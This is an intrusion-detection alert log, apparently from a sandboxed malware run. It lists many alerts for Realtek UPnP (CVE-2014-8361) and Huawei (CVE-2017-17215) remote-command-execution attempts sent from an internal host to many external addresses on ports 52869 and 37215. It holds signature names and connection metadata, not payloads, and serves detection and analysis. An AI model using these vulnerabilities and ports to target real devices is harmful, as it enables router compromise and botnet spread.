                                                07/20/24-23:06:19.955933TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3374652869192.168.2.1449.66.14.28
                                                07/20/24-23:05:37.542289TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5455052869192.168.2.14134.144.46.130
                                                07/20/24-23:05:52.570741TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23405252869192.168.2.14182.31.232.148
                                                07/20/24-23:05:45.424850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432837215192.168.2.1441.205.214.141
                                                07/20/24-23:05:59.286385TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23669652869192.168.2.14141.5.120.100
                                                07/20/24-23:05:35.755759TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615482852869192.168.2.14195.182.30.127
                                                07/20/24-23:05:37.440173TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23291652869192.168.2.14145.229.168.132
                                                07/20/24-23:05:47.137205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4226837215192.168.2.1441.168.58.131
                                                07/20/24-23:06:02.066021TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615012452869192.168.2.1493.60.39.218
                                                07/20/24-23:06:11.546878TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5554052869192.168.2.14114.44.226.32
                                                07/20/24-23:06:22.925505TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615069652869192.168.2.14148.83.111.89
                                                07/20/24-23:06:16.584797TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3552052869192.168.2.14147.197.189.218
                                                07/20/24-23:05:39.747656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5156237215192.168.2.14157.50.140.179
                                                07/20/24-23:05:58.262546TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5508652869192.168.2.1479.99.137.178
                                                07/20/24-23:06:00.620654TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615823452869192.168.2.14101.76.199.86
                                                07/20/24-23:06:29.762937TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614099652869192.168.2.14180.190.149.207
                                                07/20/24-23:05:36.324524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4005037215192.168.2.1488.161.48.213
                                                07/20/24-23:05:45.429987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5223437215192.168.2.1491.215.7.123
                                                07/20/24-23:05:37.895962TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24129452869192.168.2.14189.150.109.151
                                                07/20/24-23:06:10.507185TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24064652869192.168.2.14119.77.231.32
                                                07/20/24-23:06:17.661736TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5582252869192.168.2.1440.173.149.130
                                                07/20/24-23:05:50.559359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4318037215192.168.2.14157.204.22.38
                                                07/20/24-23:06:00.257590TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5765052869192.168.2.14144.12.181.130
                                                07/20/24-23:05:34.624854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3989637215192.168.2.1441.19.68.136
                                                07/20/24-23:05:58.995248TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613820052869192.168.2.14126.169.68.235
                                                07/20/24-23:05:35.925407TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4440252869192.168.2.14157.63.164.204
                                                07/20/24-23:06:05.520793TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5636852869192.168.2.14180.7.73.104
                                                07/20/24-23:05:42.257816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5476437215192.168.2.14197.98.241.162
                                                07/20/24-23:06:01.143972TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3385652869192.168.2.14210.23.138.187
                                                07/20/24-23:05:58.787162TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615374052869192.168.2.1474.72.162.6
                                                07/20/24-23:06:20.738854TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615768852869192.168.2.14198.156.221.225
                                                07/20/24-23:05:52.554753TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4989852869192.168.2.14131.101.133.159
                                                07/20/24-23:06:02.449959TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4578652869192.168.2.14112.166.149.158
                                                07/20/24-23:05:58.344973TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614596652869192.168.2.14187.76.135.2
                                                07/20/24-23:05:39.039093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4627437215192.168.2.1441.37.179.217
                                                07/20/24-23:05:52.502632TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3491452869192.168.2.1427.61.113.9
                                                07/20/24-23:05:57.149453TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616086252869192.168.2.14161.67.254.245
                                                07/20/24-23:05:40.488770TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24045852869192.168.2.14219.185.28.245
                                                07/20/24-23:06:01.759260TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25673452869192.168.2.14186.11.211.163
                                                07/20/24-23:06:00.147952TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614475852869192.168.2.14221.15.178.178
                                                07/20/24-23:06:07.167348TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615738452869192.168.2.1466.44.98.255
                                                07/20/24-23:05:57.947146TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614429852869192.168.2.1484.85.135.93
                                                07/20/24-23:05:38.709620TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4919252869192.168.2.1460.68.102.220
                                                07/20/24-23:06:00.558004TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5827452869192.168.2.14103.161.142.105
                                                07/20/24-23:05:36.323603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5489037215192.168.2.1441.60.177.13
                                                07/20/24-23:06:01.464393TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614902852869192.168.2.14190.39.69.46
                                                07/20/24-23:06:02.047373TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23412652869192.168.2.14182.249.57.247
                                                07/20/24-23:06:05.799314TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3379652869192.168.2.1493.234.150.111
                                                07/20/24-23:05:42.233806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4622837215192.168.2.14157.165.53.82
                                                07/20/24-23:05:52.443193TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25124652869192.168.2.14182.111.218.236
                                                07/20/24-23:05:59.096689TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23751652869192.168.2.1468.46.136.41
                                                07/20/24-23:06:02.841574TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5044652869192.168.2.1438.57.241.117
                                                07/20/24-23:05:56.994750TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5544252869192.168.2.1432.221.18.235
                                                07/20/24-23:08:36.017976TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4632852869192.168.2.14143.103.141.123
                                                07/20/24-23:05:47.724263TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3823852869192.168.2.14189.133.191.207
                                                07/20/24-23:06:13.612988TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5477652869192.168.2.1448.48.212.101
                                                07/20/24-23:06:03.269499TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24196852869192.168.2.1471.171.254.193
                                                07/20/24-23:05:33.855567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6021837215192.168.2.14197.207.102.189
                                                07/20/24-23:05:52.513067TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4072052869192.168.2.1486.71.169.225
                                                07/20/24-23:05:52.557712TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4206852869192.168.2.148.0.192.243
                                                07/20/24-23:06:01.910350TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23829052869192.168.2.1460.51.96.114
                                                07/20/24-23:06:19.817334TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615973052869192.168.2.14184.94.246.141
                                                07/20/24-23:05:57.898445TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25104452869192.168.2.1420.69.99.207
                                                07/20/24-23:05:34.654274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5251837215192.168.2.14197.49.145.149
                                                07/20/24-23:05:38.949221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5146037215192.168.2.14197.41.135.240
                                                07/20/24-23:05:50.611308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4689237215192.168.2.1441.216.22.102
                                                07/20/24-23:06:03.193739TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3801652869192.168.2.14217.202.73.187
                                                07/20/24-23:05:38.957923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3431637215192.168.2.1441.143.141.142
                                                07/20/24-23:05:57.123864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3887452869192.168.2.14142.8.237.197
                                                07/20/24-23:05:48.800446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3280037215192.168.2.14157.227.1.219
                                                07/20/24-23:05:33.857159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5698037215192.168.2.14157.76.189.3
                                                07/20/24-23:05:52.493434TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25214252869192.168.2.14105.68.61.194
                                                07/20/24-23:06:38.097414TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615234852869192.168.2.14179.199.183.88
                                                07/20/24-23:05:36.282306TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614120052869192.168.2.14140.198.134.198
                                                07/20/24-23:05:56.036527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5336237215192.168.2.1441.232.63.64
                                                07/20/24-23:05:57.432998TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23958452869192.168.2.14159.135.65.187
                                                07/20/24-23:05:35.339211TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614268052869192.168.2.1419.45.76.169
                                                07/20/24-23:06:27.648191TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613583652869192.168.2.14131.71.38.140
                                                07/20/24-23:05:39.678174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4877437215192.168.2.1441.114.140.124
                                                07/20/24-23:05:37.442743TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5077052869192.168.2.14101.86.111.6
                                                07/20/24-23:06:01.997543TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24590652869192.168.2.1465.77.245.190
                                                07/20/24-23:06:06.631877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5016837215192.168.2.14197.158.115.164
                                                07/20/24-23:06:46.927906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5951037215192.168.2.1441.32.106.205
                                                07/20/24-23:06:20.035971TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25622452869192.168.2.1440.173.149.130
                                                07/20/24-23:05:34.662338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3373237215192.168.2.14197.152.47.25
                                                07/20/24-23:05:36.339999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5979637215192.168.2.14157.57.125.1
                                                07/20/24-23:05:36.526908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5816037215192.168.2.14149.146.147.141
                                                07/20/24-23:05:40.486123TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25010452869192.168.2.14165.39.41.234
                                                07/20/24-23:05:47.483839TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4179452869192.168.2.1434.35.146.155
                                                07/20/24-23:05:35.871750TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613585652869192.168.2.14162.12.166.249
                                                07/20/24-23:05:39.039093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4245837215192.168.2.1441.213.86.222
                                                07/20/24-23:05:59.280739TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614971652869192.168.2.14209.239.99.54
                                                07/20/24-23:05:58.374852TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614282052869192.168.2.14169.254.99.226
                                                07/20/24-23:05:57.188540TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615558652869192.168.2.1485.33.92.254
                                                07/20/24-23:06:12.745128TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24738852869192.168.2.14147.98.124.138
                                                07/20/24-23:06:01.373997TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3442652869192.168.2.14195.241.186.3
                                                07/20/24-23:05:38.508603TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5770452869192.168.2.14163.148.202.115
                                                07/20/24-23:05:36.070537TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3512052869192.168.2.14162.47.82.104
                                                07/20/24-23:05:39.680161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5815237215192.168.2.14177.75.203.96
                                                07/20/24-23:06:00.452299TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23961452869192.168.2.14216.168.149.77
                                                07/20/24-23:05:52.570741TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23853252869192.168.2.14161.253.139.174
                                                07/20/24-23:05:38.672264TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614605852869192.168.2.1438.103.25.108
                                                07/20/24-23:06:20.550859TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23960852869192.168.2.1490.186.107.209
                                                07/20/24-23:05:48.775023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5691637215192.168.2.14157.77.25.6
                                                07/20/24-23:05:57.575004TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3817452869192.168.2.14186.153.223.147
                                                07/20/24-23:05:57.144593TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5888852869192.168.2.14125.131.87.203
                                                07/20/24-23:05:35.361374TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614323252869192.168.2.1436.164.151.170
                                                07/20/24-23:07:11.843007TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3829252869192.168.2.14151.202.82.160
                                                07/20/24-23:05:57.919151TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613918252869192.168.2.14128.134.241.5
                                                07/20/24-23:06:03.368314TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5565452869192.168.2.14220.74.16.80
                                                07/20/24-23:06:11.420819TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23616052869192.168.2.14219.116.120.228
                                                07/20/24-23:05:47.101730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5888437215192.168.2.1427.195.70.80
                                                07/20/24-23:05:36.339999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5440837215192.168.2.14197.105.100.5
                                                07/20/24-23:06:31.001861TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3422452869192.168.2.1471.4.254.9
                                                07/20/24-23:05:45.439167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6086037215192.168.2.1441.210.17.99
                                                07/20/24-23:06:38.756534TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614568252869192.168.2.14133.114.52.21
                                                07/20/24-23:05:59.118554TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615839852869192.168.2.14184.148.136.22
                                                07/20/24-23:05:42.143657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5574437215192.168.2.14197.64.105.126
                                                07/20/24-23:05:57.152960TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23717252869192.168.2.14193.66.175.30
                                                07/20/24-23:05:52.589392TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3363452869192.168.2.1476.37.36.156
                                                07/20/24-23:05:37.447263TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5548452869192.168.2.14181.62.64.51
                                                07/20/24-23:06:46.064783TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615413652869192.168.2.1488.238.72.249
                                                07/20/24-23:05:35.372966TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3758452869192.168.2.14150.186.198.246
                                                07/20/24-23:07:11.843007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3650637215192.168.2.14197.217.235.26
                                                07/20/24-23:06:05.032317TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3447052869192.168.2.145.28.25.19
                                                07/20/24-23:05:35.604858TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5567252869192.168.2.1427.205.21.176
                                                07/20/24-23:05:58.922584TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25924052869192.168.2.14125.131.87.203
                                                07/20/24-23:05:58.004179TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3384652869192.168.2.14201.21.236.203
                                                07/20/24-23:05:40.423413TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6008852869192.168.2.14218.43.11.190
                                                07/20/24-23:05:36.325662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5134837215192.168.2.1441.70.222.142
                                                07/20/24-23:05:39.582127TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616074652869192.168.2.14168.96.116.176
                                                07/20/24-23:05:48.807124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4325437215192.168.2.1441.63.30.246
                                                07/20/24-23:05:38.945198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3335237215192.168.2.14197.82.121.221
                                                07/20/24-23:05:35.867960TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614453452869192.168.2.14158.68.165.132
                                                07/20/24-23:05:37.487250TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5530852869192.168.2.1431.182.192.107
                                                07/20/24-23:05:34.648426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5765437215192.168.2.14197.155.87.199
                                                07/20/24-23:05:40.440618TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6011452869192.168.2.1474.254.17.92
                                                07/20/24-23:06:00.164569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5672652869192.168.2.1487.172.32.236
                                                07/20/24-23:05:45.389146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5896237215192.168.2.14157.80.126.166
                                                07/20/24-23:05:40.406154TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26085252869192.168.2.14183.189.61.173
                                                07/20/24-23:05:56.915956TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614022252869192.168.2.14183.154.100.223
                                                07/20/24-23:05:36.327720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5914437215192.168.2.1441.62.12.100
                                                07/20/24-23:06:06.112950TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5218052869192.168.2.1454.49.52.11
                                                07/20/24-23:05:45.753312TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4013652869192.168.2.14179.214.191.139
                                                07/20/24-23:06:24.267901TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614071652869192.168.2.14191.139.246.160
                                                07/20/24-23:05:40.260797TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5587852869192.168.2.141.57.80.92
                                                07/20/24-23:05:50.557200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717837215192.168.2.1441.186.62.73
                                                07/20/24-23:06:22.218849TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5998852869192.168.2.14184.94.246.141
                                                07/20/24-23:05:58.720996TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6005652869192.168.2.14179.139.227.149
                                                07/20/24-23:06:01.264639TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24523652869192.168.2.1494.132.77.54
                                                07/20/24-23:05:37.497165TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25793452869192.168.2.14156.87.172.3
                                                07/20/24-23:05:33.863090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4147237215192.168.2.14197.237.160.210
                                                07/20/24-23:05:50.576749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5079237215192.168.2.1441.83.93.4
                                                07/20/24-23:05:37.444466TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3298052869192.168.2.1419.97.179.204
                                                07/20/24-23:05:45.112360TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613851052869192.168.2.1432.113.241.254
                                                07/20/24-23:05:47.103906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3306637215192.168.2.14201.37.202.18
                                                07/20/24-23:06:01.121675TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5475252869192.168.2.1440.178.115.144
                                                07/20/24-23:06:02.373413TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3764852869192.168.2.1469.155.223.182
                                                07/20/24-23:06:12.623995TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5332052869192.168.2.14132.235.217.106
                                                07/20/24-23:05:59.565815TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24757252869192.168.2.1468.28.176.54
                                                07/20/24-23:06:15.480465TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4786052869192.168.2.1414.172.205.140
                                                07/20/24-23:05:48.183114TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613864052869192.168.2.1498.121.52.186
                                                07/20/24-23:06:14.554681TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615299052869192.168.2.1487.40.14.56
                                                07/20/24-23:05:47.106820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5350437215192.168.2.1425.149.170.104
                                                07/20/24-23:06:00.544318TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3563652869192.168.2.14180.193.127.65
                                                07/20/24-23:05:46.056805TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613355252869192.168.2.1432.146.109.53
                                                07/20/24-23:05:57.171385TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613464852869192.168.2.1489.30.212.13
                                                07/20/24-23:06:01.278505TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5029652869192.168.2.1413.136.43.134
                                                07/20/24-23:05:59.290845TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3791252869192.168.2.14159.0.2.81
                                                07/20/24-23:05:50.528919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5775237215192.168.2.1423.21.50.26
                                                07/20/24-23:07:06.633526TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5283852869192.168.2.14211.22.232.253
                                                07/20/24-23:05:47.086079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4628637215192.168.2.1496.86.134.95
                                                07/20/24-23:05:56.022964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5160837215192.168.2.1441.191.82.175
                                                07/20/24-23:05:39.680161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5676637215192.168.2.14157.97.32.183
                                                07/20/24-23:05:52.535101TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5781052869192.168.2.14113.82.161.254
                                                07/20/24-23:06:06.107642TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24320052869192.168.2.1412.208.13.200
                                                07/20/24-23:06:15.439915TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25496252869192.168.2.1499.203.53.121
                                                07/20/24-23:05:47.280490TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4184052869192.168.2.14143.164.138.163
